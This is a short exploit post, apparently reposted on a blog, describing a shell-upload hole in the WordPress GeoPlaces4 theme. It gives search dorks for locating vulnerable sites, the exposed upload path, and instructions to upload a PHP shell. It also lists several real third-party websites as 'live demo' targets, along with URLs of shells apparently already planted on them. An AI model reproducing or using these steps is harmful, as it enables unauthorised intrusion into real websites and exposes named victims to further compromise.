• 03 February 2015

    
    
    #Author : DevilScreaM
    
    #Date : 10/24/2013
    
    #Category : Web Applications
    
    #Type : PHP
    
    #Version : 4.x
    
    #Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
         Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
    
    #Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
    
    #Vulnerabillity : Shell Upload
    
    #Dork : 
    inurl:wp-content/themes/geoplaces4/
    inurl:wp-content/themes/GeoPlaces4beta/
    
    
    Exploit & POC
    
    http://site-target/wp-content/themes/GeoPlaces4beta/monetize/upload/
    
    Result Upload
    
    http://site-target/wp-content/uploads/[years]/[months]/[Find_your_shell].php
    
    Click Browse, And Choose your shell..
    
    
    Live Demo :
    
    http://novalocal.com/wp-content/themes/GeoPlaces4beta/monetize/upload/
    http://icollec.com/wwAgendascope/wp-content/themes/GeoPlaces4/monetize/upload/
    http://gpsys.com.br/curta/wp-content/themes/GeoPlaces4.3/monetize/upload/
    
    Result :
    
    http://novalocal.com/wp-content/uploads/2013/10/13826076391235083424.php
    http://icollec.com/wwAgendascope/wp-content/uploads/2013/10/13826080342139189430.php
    http://gpsys.com.br/curta/wp-content/uploads/2013/10/1382608315784907842.php

    0 comments

  • Nisekoi Template Designed by Johanes Djogan

    ©2016 - ReDesigned By Ani-Sudo